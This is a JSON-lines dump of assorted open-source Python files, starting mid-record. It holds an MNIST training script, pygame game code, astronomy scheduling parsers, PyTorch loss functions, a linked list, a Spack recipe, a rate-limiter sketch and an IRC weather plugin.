__name__ == '__main__':\n goal = [1, 2, 3, 4, 5, 6, 7, 8, 0]\n inputs = samples(goal, 3)\n mean = 0\n for puzzle in inputs:\n mean += solve(3, puzzle,goal)\n mean = mean /100\n print(\"Mean: {}\".format(mean))","sub_path":"8-puzzle-solver/bfsNpuzzle.py","file_name":"bfsNpuzzle.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"315438691","text":"from torch import nn\nimport torch.nn.functional as F\nimport torch\nimport sys\nimport argparse\nimport numpy as np\nimport torch\nfrom torch import nn, optim\nimport matplotlib.pyplot as plt\nfrom torchvision import datasets, transforms\nimport torchvision\nimport wandb\n\n\nwandb.init()\nkernel_size = 5\nchannel_sizes = [1, 6, 16]\nhidden_sizes = [256, 120, 84]\noutput_size = 10\ndropout_rate = 0.2\n\nclass MyAwesomeModel(nn.Module):\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(channel_sizes[0], channel_sizes[1], kernel_size)\n self.conv2 = nn.Conv2d(channel_sizes[1], channel_sizes[2], kernel_size)\n # an affine operation: y = Wx + b\n self.fc1 = nn.Linear(hidden_sizes[0], hidden_sizes[1]) # 5*5 from image dimension\n self.fc2 = nn.Linear(hidden_sizes[1], hidden_sizes[2])\n self.fc3 = nn.Sequential(nn.Linear(hidden_sizes[2], output_size),nn.LogSoftmax(dim=1))\n self.dropout = nn.Dropout(p = dropout_rate)\n\n def forward(self, x):\n # Max pooling over a (2, 2) window\n x = self.dropout(F.max_pool2d(F.relu(self.conv1(x)), (2, 2)))\n #print('x shape', x.shape)\n # If the size is a square, you can specify with a single number\n x = self.dropout(F.max_pool2d(F.relu(self.conv2(x)), 2))\n #print('x shape2', x.shape)\n x = torch.flatten(x, 1) # flatten all dimensions except the batch dimension\n #print('x shape3', x.shape)\n x = self.dropout(F.relu(self.fc1(x)))\n x = self.dropout(F.relu(self.fc2(x)))\n x = self.fc3(x)\n return x\n\ntransform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.5,), (0.5,))])\ntrain_set = datasets.MNIST('./.pytorch/MNIST_data/', download=True, train=True, transform=transform)\ntest_set = datasets.MNIST('./.pytorch/MNIST_data/', download=True, train=False, transform=transform)\n\nprint(\"Training day and night\")\nparser = argparse.ArgumentParser(description='Training arguments')\nparser.add_argument('--lr', default=0.003)\n# add any additional argument that you want\nargs = parser.parse_args(sys.argv[2:])\nprint(args)\n \nmodel = MyAwesomeModel()\nwandb.watch(model, log_freq=100)\n\ntrainloader = torch.utils.data.DataLoader(train_set, batch_size=64, shuffle=True)\ncriterion = nn.NLLLoss()\noptimizer = optim.Adam(model.parameters(), lr=0.003)\n\nepochs = 5\nsteps = 0\n\ntrain_losses, test_losses = [], []\nloss_epoch = []\nepoch_no = []\nfor e in range(epochs):\n print(\"Starting epoch \", e+1)\n running_loss = 0\n for images, labels in trainloader:\n model.train()\n optimizer.zero_grad()\n \n log_ps = model(images)\n loss = criterion(log_ps, labels)\n loss.backward()\n optimizer.step()\n wandb.log({\"loss\": loss})\n train_losses.append(loss.item())\n wandb.log({\"Input images\" : [wandb.Image(i) for i in images]})\n\n print('Loss: ', np.mean(train_losses))\n\n # for epoch vs loss plot \n epoch_no.append(e+1)\n loss_epoch.append(np.mean(train_losses))\n\ntorch.save(model.state_dict(), 'checkpoint.pth') # save model \nplt.plot(epoch_no, loss_epoch, label='Training loss')\nplt.xlabel('Epoch number')\nplt.legend()\nplt.show() ","sub_path":"03_debuggin_and_visualization/training_file_wandb.py","file_name":"training_file_wandb.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"472001270","text":"import pygame\r\nimport constants\r\n\r\nfrom platforms import MovingPlatform\r\nfrom spritesheet_functions import SpriteSheet\r\n\r\n # --- Link Player Sprite\r\nclass Player(pygame.sprite.Sprite):\r\n # this class represents the bar at the bottom that the player controls\r\n\r\n # -- methods\r\n def __init__(self):\r\n #constructor function\r\n super(Player, self).__init__()\r\n\r\n # attributes\r\n # set vector speed\r\n self.change_x = 0\r\n self.change_y = 0\r\n\r\n # this holds all the animated images for walking left/right\r\n self.walking_frames_l = []\r\n self.walking_frames_r = []\r\n\r\n # What direction is the player facing?\r\n self.direction = \"R\"\r\n\r\n # list of sprites we can bump up against\r\n self.level = None\r\n\r\n sprite_sheet = SpriteSheet('link_sprite.png')\r\n # Load all the right facing images into a list\r\n #image = sprite_sheet.get_image(18,750,104,148)\r\n #self.walking_frames_r.append(image)\r\n image = sprite_sheet.get_image(23,99,41,69)\r\n self.walking_frames_r.append(image)\r\n image = sprite_sheet.get_image(113,102,38,66)\r\n self.walking_frames_r.append(image)\r\n image = sprite_sheet.get_image(205,106,40,59)\r\n self.walking_frames_r.append(image)\r\n image = sprite_sheet.get_image(299,102,35,65)\r\n self.walking_frames_r.append(image)\r\n image = sprite_sheet.get_image(390,106,32,61)\r\n self.walking_frames_r.append(image)\r\n\r\n\r\n # Load all the right facing images, then flip to face left\r\n\r\n #image = sprite_sheet.get_image(18,750,104,148)\r\n #image = pygame.transform.flip(image, True, False)\r\n #self.walking_frames_l.append(image)\r\n image = sprite_sheet.get_image(23,99,41,69)\r\n image = pygame.transform.flip(image, True, False)\r\n self.walking_frames_l.append(image)\r\n image = sprite_sheet.get_image(113,102,38,66)\r\n image = pygame.transform.flip(image, True, False)\r\n self.walking_frames_l.append(image)\r\n image = sprite_sheet.get_image(205,106,40,59)\r\n image = pygame.transform.flip(image, True, False)\r\n self.walking_frames_l.append(image)\r\n image = sprite_sheet.get_image(299,102,35,65)\r\n image = pygame.transform.flip(image, True, False)\r\n self.walking_frames_l.append(image)\r\n image = sprite_sheet.get_image(390,106,32,61)\r\n image = pygame.transform.flip(image, True, False)\r\n\r\n\r\n # Set the image player starts with\r\n self.image = self.walking_frames_r[0]\r\n\r\n # set a reference to the image rect\r\n self.rect = self.image.get_rect()\r\n\r\n def update(self):\r\n # move the player\r\n # Gravity\r\n self.calc_grav()\r\n\r\n # move left/right\r\n self.rect.x += self.change_x\r\n pos = self.rect.x + self.level.world_shift\r\n if self.direction == \"R\":\r\n frame = (pos // 30) % len(self.walking_frames_r)\r\n self.image = self.walking_frames_r[frame]\r\n else:\r\n frame = (pos // 30) % len(self.walking_frames_l)\r\n self.image = self.walking_frames_l[frame]\r\n\r\n # see if hit anything\r\n block_hit_list = pygame.sprite.spritecollide(self, self.level.platform_list, False)\r\n for block in block_hit_list:\r\n if self.change_x > 0:\r\n self.rect.right = block.rect.left\r\n elif self.change_x < 0:\r\n self.rect.left = block.rect.right\r\n\r\n # move up/down\r\n self.rect.y += self.change_y\r\n\r\n # check if hit anything\r\n block_hit_list = pygame.sprite.spritecollide(self, self.level.platform_list, False)\r\n for block in block_hit_list:\r\n if self.change_y > 0:\r\n self.rect.bottom = block.rect.top\r\n elif self.change_y < 0:\r\n self.rect.top = block.rect.bottom\r\n\r\n # stop vertival movement\r\n self.change_y = 0\r\n\r\n if isinstance(block, MovingPlatform):\r\n self.rect.x += block.change_x\r\n\r\n def calc_grav(self):\r\n # calc effects of gravity\r\n if self.change_y == 0:\r\n self.change_y = 1\r\n else:\r\n self.change_y += .35\r\n\r\n # see if we are on the ground\r\n if self.rect.y >= constants.SCREEN_HEIGHT - self.rect.height and self.change_y >= 0:\r\n self.change_y = 0\r\n self.rect.y = constants.SCREEN_HEIGHT - self.rect.height\r\n\r\n def jump(self):\r\n\r\n self.rect.y += 2\r\n platform_hit_list = pygame.sprite.spritecollide(self, self.level.platform_list, False)\r\n self.rect.y -= 2\r\n\r\n # if it's ok to jump, set speed upwards\r\n if len(platform_hit_list) > 0 or self.rect.bottom >= constants.SCREEN_HEIGHT:\r\n self.change_y = -10\r\n\r\n # Player Controlled Movement\r\n def go_left(self):\r\n # called when user hits the Left Arrow\r\n self.change_x = -6\r\n self.direction = \"L\"\r\n\r\n def go_right(self):\r\n self.change_x =6\r\n self.direction = \"R\"\r\n\r\n def stop(self):\r\n # called when nothing is being pressed\r\n self.change_x = 0\r\n","sub_path":"some_platformer/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":5188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"628832141","text":"# Copyright (c) 2016-2023 Association of Universities for Research in Astronomy, Inc. (AURA)\n# For license information see LICENSE or https://opensource.org/licenses/BSD-3-Clause\n\nimport re\nimport os\nfrom typing import Dict, Set, FrozenSet\nfrom datetime import date, datetime, timedelta\nfrom dataclasses import dataclass\n\nfrom astropy.time import Time\nfrom lucupy.sky import night_events\nfrom lucupy.minimodel import ALL_SITES, Site\n\nfrom definitions import ROOT_DIR\nfrom scheduler.services.abstract import ExternalService\n\n\n@dataclass(frozen=True)\nclass Interruption:\n \"\"\"\n Parent class for any interruption in the night that would\n cause missing time of observation.\n \"\"\"\n start: datetime\n time_loss: timedelta\n reason: str\n\n\n@dataclass(frozen=True)\nclass Fault(Interruption):\n id: str\n\n\n@dataclass(frozen=True)\nclass EngTask(Interruption):\n end: datetime\n\n\nclass ChronicleService(ExternalService):\n\n def __init__(self, sites: FrozenSet[Site] = ALL_SITES):\n self._sites = sites\n self._path = os.path.join(ROOT_DIR, 'scheduler', 'services', 'chronicle', 'data')\n # Fault reports by datetime to calculate missing instruments\n self._faults: Dict[Site, Dict[date, Set[Fault]]] = {site: {} for site in self._sites}\n\n # Engineering Task by datetime.\n self._eng_task: Dict[Site, Dict[date, Set[EngTask]]] = {site: {} for site in self._sites}\n\n\nclass FileBasedChronicle(ChronicleService):\n\n def _parse_eng_task_file(self, site: Site, to_file: str) -> None:\n \"\"\"\n Parse Engineering task that block moments or the entire night.\n Each twilight is calculated using lucupy.sky, some discrepancies might affect.\n \"\"\"\n pattern = r'(\\[.*\\])'\n # Ignore GS until the file is created.\n if site is Site.GS:\n return\n\n with open(os.path.join(self._path, to_file), 'r') as file:\n for line_num, line in enumerate(file):\n # Find pattern to keep bracket comments not split.\n match = re.search(pattern, line)\n if match:\n comment = match.group(1)\n rest_of_line = re.sub(pattern, '', line)\n eng_date, start_time, end_time = rest_of_line.strip().split()\n # Single date for key\n just_date = datetime.strptime(eng_date, '%Y-%m-%d')\n # Time day in jd to calculate twilight\n time = Time(just_date)\n _, _, _, even_12twi, morn_12twi, _, _ = night_events(time,\n site.location,\n site.timezone)\n\n # Handle twilight\n if start_time == 'twi':\n start_date = even_12twi.datetime\n end_date = (morn_12twi.datetime if end_time == 'twi' else\n datetime.strptime(f'{eng_date} {end_time}', '%Y-%m-%d %H:%M'))\n else:\n start_date = datetime.strptime(f'{eng_date} {start_time}', '%Y-%m-%d %H:%M')\n end_date = (morn_12twi.datetime if end_time == 'twi'\n else datetime.strptime(f'{eng_date} {end_time}', '%Y-%m-%d %H:%M'))\n\n time_loss = end_date - start_date\n eng_task = EngTask(start=start_date,\n end=end_date,\n time_loss=time_loss,\n reason=comment)\n\n if just_date in self._eng_task[site]:\n self._eng_task[site][just_date].add(eng_task)\n else:\n self._eng_task[site][just_date] = {eng_task}\n else:\n raise ValueError(f'Pattern not found. Format error on Eng Task file at line {line_num}')\n\n def _parse_faults_file(self, site: Site, to_file: str) -> None:\n \"\"\"Parse faults from files.\n This is purposeful left non-private as might be used with incoming files from\n the React app.\n \"\"\"\n # Files contains this repetitive string in each timestamp, if we need them\n # we could add them as constants.\n ts_clean = ' 04:00' if site is Site.GS else ' 10:00'\n with open(os.path.join(self._path, to_file), 'r') as file:\n for line_num, original_line in enumerate(file):\n line = original_line.rstrip() # remove trail spaces\n if line: # ignore empty lines\n if line[0].isdigit():\n # TODO: Unused variable and just a string, not a semester.\n semester = line\n elif line.startswith('FR'): # found a fault\n items = line.split('\\t')\n # Create timestamp with ts_clean var removed\n ts = datetime.strptime(items[1].replace(ts_clean, ''),\n '%Y %m %d %H:%M:%S')\n fault = Fault(id=items[0],\n start=ts, # date with time\n time_loss=timedelta(hours=float(items[2])), # time loss\n reason=items[3]) # comment for the fault\n if ts.date() in self._faults[site]:\n self._faults[site][ts.date()].add(fault)\n else:\n self._faults[site][ts.date()] = {fault}\n else:\n raise ValueError(f'Fault file has wrong format at line {line_num}')\n","sub_path":"scheduler/services/chronicle/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"409054566","text":"\"\"\"\r\nInspired from Monoloco\r\nCauchy,GEV losses have been added\r\n\"\"\"\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\n\r\nimport math\r\nimport torch\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nclass CustomL1Loss(torch.nn.Module):\r\n \"\"\"\r\n L1 loss with more weight to errors at a shorter distance\r\n It inherits from nn.module so it supports backward\r\n \"\"\"\r\n\r\n def __init__(self, dic_norm, device, beta=1):\r\n super(CustomL1Loss, self).__init__()\r\n\r\n self.dic_norm = dic_norm\r\n self.device = device\r\n self.beta = beta\r\n\r\n @staticmethod\r\n def compute_weights(xx, beta=1):\r\n \"\"\"\r\n Return the appropriate weight depending on the distance and the hyperparameter chosen\r\n alpha = 1 refers to the curve of A Photogrammetric Approach for Real-time...\r\n It is made for unnormalized outputs (to be more understandable)\r\n From 70 meters on every value is weighted the same (0.1**beta)\r\n Alpha is optional value from Focal loss. Yet to be analyzed\r\n \"\"\"\r\n # alpha = np.maximum(1, 10 ** (beta - 1))\r\n alpha = 1\r\n ww = np.maximum(0.1, 1 - xx / 78)**beta\r\n\r\n return alpha * ww\r\n\r\n def print_loss(self):\r\n xx = np.linspace(0, 80, 100)\r\n y1 = self.compute_weights(xx, beta=1)\r\n y2 = self.compute_weights(xx, beta=2)\r\n y3 = self.compute_weights(xx, beta=3)\r\n plt.plot(xx, y1)\r\n plt.plot(xx, y2)\r\n plt.plot(xx, y3)\r\n plt.xlabel(\"Distance [m]\")\r\n plt.ylabel(\"Loss function Weight\")\r\n plt.legend((\"Beta = 1\", \"Beta = 2\", \"Beta = 3\"))\r\n plt.show()\r\n\r\n def forward(self, output, target):\r\n\r\n unnormalized_output = output.cpu().detach().numpy() * self.dic_norm['std']['Y'] + self.dic_norm['mean']['Y']\r\n weights_np = self.compute_weights(unnormalized_output, self.beta)\r\n weights = torch.from_numpy(weights_np).float().to(self.device) # To make weights in the same cuda device\r\n losses = torch.abs(output - target) * weights\r\n loss = losses.mean() # Mean over the batch\r\n return loss\r\n\r\n\r\nclass LaplacianLoss(torch.nn.Module):\r\n \"\"\"1D Gaussian with std depending on the absolute distance\r\n \"\"\"\r\n def __init__(self, size_average=True, reduce=True, evaluate=False):\r\n super(LaplacianLoss, self).__init__()\r\n self.size_average = size_average\r\n self.reduce = reduce\r\n self.evaluate = evaluate\r\n\r\n def laplacian_1d(self, mu_si, xx):\r\n \"\"\"\r\n 1D Gaussian Loss. f(x | mu, sigma). The network outputs mu and sigma. X is the ground truth distance.\r\n This supports backward().\r\n Inspired by\r\n https://github.com/naba89/RNN-Handwriting-Generation-Pytorch/blob/master/loss_functions.py\r\n\r\n \"\"\"\r\n mu, si = mu_si[:, 0:1], mu_si[:, 1:2]\r\n # norm = xx - mu\r\n norm = 1 - mu / xx # Relative\r\n\r\n term_a = torch.abs(norm) * torch.exp(-si)\r\n \r\n \r\n \r\n term_b = si\r\n \r\n norm_bi = (np.mean(np.abs(norm.cpu().detach().numpy())), np.mean(torch.exp(si).cpu().detach().numpy()))\r\n \r\n if self.evaluate:\r\n return norm_bi\r\n return term_a + term_b\r\n\r\n def forward(self, outputs, targets):\r\n\r\n values = self.laplacian_1d(outputs, targets)\r\n\r\n if not self.reduce or self.evaluate:\r\n return values\r\n if self.size_average:\r\n mean_values = torch.mean(values)\r\n return mean_values\r\n return torch.sum(values)\r\n\r\n\r\nclass GaussianLoss(torch.nn.Module):\r\n \"\"\"1D Gaussian with std depending on the absolute distance\r\n \"\"\"\r\n def __init__(self, device, size_average=True, reduce=True, evaluate=False):\r\n super(GaussianLoss, self).__init__()\r\n self.size_average = size_average\r\n self.reduce = reduce\r\n self.evaluate = evaluate\r\n self.device = device\r\n\r\n def gaussian_1d(self, mu_si, xx):\r\n \"\"\"\r\n 1D Gaussian Loss. f(x | mu, sigma). The network outputs mu and sigma. X is the ground truth distance.\r\n This supports backward().\r\n Inspired by\r\n https://github.com/naba89/RNN-Handwriting-Generation-Pytorch/blob/master/loss_functions.py\r\n \"\"\"\r\n mu, si = mu_si[:, 0:1], mu_si[:, 1:2]\r\n\r\n min_si = torch.ones(si.size()).cuda(self.device) * 0.1\r\n si = torch.max(min_si, si)\r\n norm = xx - mu\r\n term_a = (norm / si)**2 / 2\r\n term_b = torch.log(si * math.sqrt(2 * math.pi))\r\n\r\n norm_si = (np.mean(np.abs(norm.cpu().detach().numpy())), np.mean(si.cpu().detach().numpy()))\r\n\r\n if self.evaluate:\r\n return norm_si\r\n\r\n return term_a + term_b\r\n\r\n def forward(self, outputs, targets):\r\n\r\n values = self.gaussian_1d(outputs, targets)\r\n\r\n if not self.reduce or self.evaluate:\r\n return values\r\n if self.size_average:\r\n mean_values = torch.mean(values)\r\n return mean_values\r\n return torch.sum(values)\r\n\r\nclass CauchyLoss(torch.nn.Module):\r\n \"\"\"\r\n author:M.V.S Sanjay\r\n mail:mvssanjay.007@gmail.com\r\n \"\"\"\r\n def __init__(self, device, size_average=True, reduce=True, evaluate=False):\r\n super(CauchyLoss, self).__init__()\r\n self.size_average = size_average\r\n self.reduce = reduce\r\n self.evaluate = evaluate\r\n self.device = device\r\n \r\n def cauchy_1d(self,mu_si,xx):\r\n\r\n mu, si= mu_si[:, 0:1], mu_si[:, 1:2]\r\n\r\n norm=torch.abs(mu-xx)# relative to xx\r\n \r\n #t_a= log(pi*b)\r\n term_a=torch.abs(si)*math.pi \r\n \r\n term_b=torch.log((((norm)/torch.exp(torch.abs(si)))**2)+1)\r\n \r\n\r\n norm_si = (np.mean(np.abs(norm.cpu().detach().numpy())), np.mean(si.cpu().detach().numpy()))\r\n if self.evaluate:\r\n return norm_si\r\n\r\n return term_a + term_b\r\n\r\n def forward(self, outputs, targets):\r\n\r\n values = self.cauchy_1d(outputs, targets)\r\n\r\n if not self.reduce or self.evaluate:\r\n return values\r\n if self.size_average:\r\n mean_values = torch.mean(values)\r\n return mean_values\r\n return torch.sum(values)\r\n \r\n\r\n \r\nclass GevLoss(torch.nn.Module):\r\n \"\"\"\r\n author: N. Pavan Srinivas\r\n mail:pavansrinivas1999@gmail.com\r\n \"\"\"\r\n def __init__(self, device, size_average=True, reduce=True, evaluate=False):\r\n super(GevLoss, self).__init__()\r\n self.size_average = size_average\r\n self.reduce = reduce\r\n self.evaluate = evaluate\r\n self.device = device\r\n \r\n def gev_1d(self,mu_si,xx):\r\n\r\n mu, si= mu_si[:, 0:1], mu_si[:, 1:2]\r\n\r\n norm=(torch.abs(mu-xx))\r\n term_c=norm*(torch.exp(-1*torch.abs(si)))\r\n term_a=torch.abs(si)\r\n \r\n #print(term_a)\r\n term_b=torch.exp(-1*(norm/torch.abs(si)))\r\n #print(\"**\"*100)\r\n #print(term_b)\r\n \r\n\r\n norm_si = (np.mean(np.abs(norm.cpu().detach().numpy())), np.mean(si.cpu().detach().numpy()))\r\n \r\n if self.evaluate:\r\n return norm_si\r\n\r\n return term_a + term_b + norm\r\n\r\n def forward(self, outputs, targets):\r\n\r\n values = self.gev_1d(outputs, targets)\r\n\r\n if not self.reduce or self.evaluate:\r\n return values\r\n if self.size_average:\r\n mean_values = torch.mean(values)\r\n return mean_values\r\n return torch.sum(values)\r\n\r\n","sub_path":"losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":7560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"627315432","text":"#!/usr/bin/python3\n'''A module for working with singly linked lists.\n'''\n\n\nclass Node:\n '''Represents a node in a singly linked list.\n '''\n def __init__(self, data, next_node=None):\n '''Initializes a Node with a given data and next link.\n\n Args:\n data (int): The data of the Node.\n next_node (Node): The Node next to this Node.\n '''\n self.data = data\n self.next_node = next_node\n\n @property\n def data(self):\n '''Retrieves the data of this Node.\n\n Returns:\n int: The data of this Node.\n '''\n return self.__data\n\n @property\n def next_node(self):\n '''Retrieves the Node next to this Node.\n\n Returns:\n Node: The Node next to this Node.\n '''\n return self.__next_node\n\n @data.setter\n def data(self, value):\n '''Updates the data of this Node.\n\n Args:\n value (int): The new data of this Node.\n '''\n if not isinstance(value, int):\n raise TypeError('data must be an integer')\n else:\n self.__data = value\n\n @next_node.setter\n def next_node(self, value):\n '''Updates the next node of this Node.\n\n Args:\n value (Node): The new node next to this Node.\n '''\n if value is None or isinstance(value, Node):\n self.__next_node = value\n else:\n raise TypeError('next_node must be a Node object')\n\n\nclass SinglyLinkedList:\n '''Represents a singly linked list.\n '''\n def __init__(self):\n '''Initializes a singly linked list.'''\n self.__head = None\n\n def sorted_insert(self, value):\n '''Inserts a new Node into the correct sorted position\n in the list (increasing order).\n\n Args:\n value (int): The data of the Node to be inserted into the list.\n '''\n if not isinstance(value, int) or value is None:\n raise TypeError('value must be an integer')\n else:\n if self.__head is None or self.__head.data >= value:\n new_node = Node(value, self.__head)\n self.__head = new_node\n else:\n node_ptr = self.__head\n prev_ptr = None\n while node_ptr is not None and value > node_ptr.data:\n prev_ptr = node_ptr\n node_ptr = node_ptr.next_node\n new_node = Node(value, node_ptr)\n prev_ptr.next_node = new_node\n\n def __str__(self):\n '''Returns a string representation of this singly linked list.\n\n Returns:\n str: A string representation of this singly linked list.\n '''\n node_ptr = self.__head\n res = []\n while node_ptr is not None:\n res.append(str(node_ptr.data))\n node_ptr = node_ptr.next_node\n return '' if len(res) == 0 else '\\n'.join(res)\n","sub_path":"0x06-python-classes/100-singly_linked_list.py","file_name":"100-singly_linked_list.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"507947788","text":"# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other\n# Spack Project Developers. See the top-level COPYRIGHT file for details.\n#\n# SPDX-License-Identifier: (Apache-2.0 OR MIT)\n\nfrom spack.package import *\n\n\nclass Kripke(CMakePackage):\n \"\"\"Kripke is a simple, scalable, 3D Sn deterministic particle\n transport proxy/mini app.\n \"\"\"\n\n homepage = \"https://computing.llnl.gov/projects/co-design/kripke\"\n git = \"https://github.com/LLNL/Kripke.git\"\n\n tags = [\"proxy-app\"]\n version(\"1.2.4\", submodules=True, tag=\"v1.2.4\")\n version(\"1.2.3\", submodules=True, tag=\"v1.2.3\")\n version(\"1.2.2\", submodules=True, tag=\"v1.2.2-CORAL2\")\n version(\"1.2.1\", submodules=True, tag=\"v1.2.1-CORAL2\")\n version(\"1.2.0\", submodules=True, tag=\"v1.2.0-CORAL2\")\n\n variant(\"mpi\", default=True, description=\"Build with MPI.\")\n variant(\"openmp\", default=True, description=\"Build with OpenMP enabled.\")\n variant(\"caliper\", default=False, description=\"Build with Caliper support enabled.\")\n\n depends_on(\"mpi\", when=\"+mpi\")\n depends_on(\"cmake@3.0:\", type=\"build\")\n depends_on(\"caliper\", when=\"+caliper\")\n\n def cmake_args(self):\n def enabled(variant):\n return 1 if variant in self.spec else 0\n\n return [\n \"-DENABLE_OPENMP=%d\" % enabled(\"+openmp\"),\n \"-DENABLE_MPI=%d\" % enabled(\"+mpi\"),\n \"-DENABLE_CALIPER=%d\" % enabled(\"+caliper\"),\n ]\n\n def install(self, spec, prefix):\n # Kripke does not provide install target, so we have to copy\n # things into place.\n mkdirp(prefix.bin)\n install(join_path(self.build_directory, \"bin/kripke.exe\"), prefix.bin)\n","sub_path":"var/spack/repos/builtin/packages/kripke/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"102441898","text":"import matplotlib.pyplot as plt\r\nimport os\r\nos.environ['FOR_DISABLE_CONSOLE_CTRL_HANDLER'] = '1'\r\ndef make_plot(viz, array, win, epoch, i, use_visdom):\r\n plt.clf()\r\n plt.plot(array)\r\n plt.title(win)\r\n plt.ylabel(win)\r\n plt.xlabel(f'{epoch}:{i}')\r\n if use_visdom:\r\n loss_win = viz.matplot(plt, win=win)\r\n\r\ndef svd_loss(inputs, label, outputs, net, reg_param = 0.01, print_losses=False, avg_const = 0):\r\n\tloss = 0.0\r\n\treg_loss = 0.0\r\n\tloss += ((label-outputs - avg_const)**2).sum()\r\n\tfor i in range(inputs.shape[0]):\r\n\t\treg_loss += reg_param * ((net.u_matrix(inputs[i][0])**2).sum() + (net.v_matrix(inputs[i][1])**2).sum())\r\n\tprint(f'loss : {loss}, reg_loss : {reg_loss}')\r\n\treturn loss+reg_loss\r\n","sub_path":"svd_util.py","file_name":"svd_util.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"493771578","text":"# ============================================================================\n# FILE: rec.py\n# AUTHOR: Shougo Matsushita \n# License: MIT license\n# ============================================================================\n\nfrom .base import Base\nimport subprocess\n\n\nclass Source(Base):\n\n def __init__(self, vim):\n Base.__init__(self, vim)\n\n self.name = 'rec'\n\n def gather_candidates(self, context):\n args = ['find', '-L', '.', '-path', '*/.git/*', '-prune', '-o',\n '-type', 'l', '-print', '-o', '-type', 'f', '-print']\n return [{'word': x, 'action__path': x}\n for x in subprocess.check_output(args).decode(\n 'utf-8').split('\\n')]\n","sub_path":"rplugin/python3/denite/source/rec.py","file_name":"rec.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"481742136","text":"import time\nimport RateLimiterInterface\nclass TokenBucket(RateLimiterInterface):\n def __init__(self, bucketCapactiy, refreshRate) -> None:\n super().__init__()\n self.bucketCapacity = bucketCapactiy\n self.refreshRate = refreshRate\n self.currentCapactiy = bucketCapactiy\n self.lastUpdatedTime = time.nowInMillis()\n\n def grantAccess(self):\n self.refreshBucket()\n if self.currentCapactiy > 0:\n self.currentCapactiy -= 1\n return True\n return False\n \n def refreshBucket(self):\n currentTime = time.nowInMillis()\n additionalToken = (currentTime - self.lastUpdatedTime) / 1000 * self.refreshRate\n currCapacity = min(self.currentCapactiy + additionalToken, self.bucketCapacity)\n self.currentCapactiy = currCapacity\n self.lastUpdatedTime = currentTime\n\n\nclass UserBucketCreator:\n def __init__(self, id) -> None:\n self.bucket = dict() # Map of int, TokenBucket\n self.bucket[id] = TokenBucket(10, 10)\n\n def accessApplication(self, id):\n if id in self.bucket and self.bucket[id].grantAccess():\n print (\"able to access application\")\n else:\n print(\"Too many request, please try after sometime\")","sub_path":"systemdesign/TokenBucketRateLimiter.py","file_name":"TokenBucketRateLimiter.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"135391089","text":"\"obscene weather\"\r\n\r\nfrom util import hook, http\r\n\r\n@hook.command(autohelp=False)\r\ndef fweather(inp, chan='', nick='', reply=None, db=None):\r\n \".fweather | @ -- gets the effin weather\"\r\n\r\n\r\n # this database is used by other plugins interested in user's locations,\r\n # like .near in tag.py\r\n db.execute(\r\n \"create table if not exists location(chan, nick, loc, lat, lon, primary key(chan, nick))\")\r\n\r\n if inp[0:1] == '@':\r\n nick = inp[1:].strip()\r\n loc = None\r\n dontsave = True\r\n else:\r\n loc = inp\r\n\r\n dontsave = loc.endswith(\" dontsave\")\r\n if dontsave:\r\n loc = loc[:-9].strip().lower()\r\n\r\n if not loc: # blank line\r\n loc = db.execute(\r\n \"select loc from location where chan=? and nick=lower(?)\",\r\n (chan, nick)).fetchone()\r\n if not loc:\r\n try:\r\n # grab from old-style weather database\r\n loc = db.execute(\"select loc from weather where nick=lower(?)\",\r\n (nick,)).fetchone()\r\n except db.OperationalError:\r\n pass # no such table\r\n if not loc:\r\n return fweather.__doc__\r\n loc = loc[0]\r\n\r\n loc, _, state = loc.partition(', ')\r\n\r\n # Check to see if a lat, long pair is being passed. This could be done more\r\n # completely with regex, and converting from DMS to decimal degrees. This\r\n # is nice and simple, however.\r\n try:\r\n float(loc)\r\n float(state)\r\n\r\n loc = loc + ',' + state\r\n state = ''\r\n except ValueError:\r\n if state:\r\n state = http.quote_plus(state)\r\n state += '/'\r\n\r\n loc = http.quote_plus(loc)\r\n\r\n url = 'http://thefuckingweather.com/'\r\n query = '?where={state}{loc}'.format(state=state, loc=loc)\r\n\r\n url += query\r\n\r\n try:\r\n parsed_html = http.get_html(url)\r\n except IOError:\r\n return 'I CAN\\'T PARSE THAT SHIT'\r\n\r\n info = {}\r\n\r\n result = parsed_html.xpath('//p[@class=\"large\"] | //p[@class=\"remark\"] | //p[@class=\"flavor\"]')\r\n\r\n if not len(result):\r\n reply('I CAN\\'T FIND THAT SHIT')\r\n return\r\n\r\n reply(' - '.join([ r.text_content() for r in result ]))\r\n","sub_path":"plugins/obsceneweather.py","file_name":"obsceneweather.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
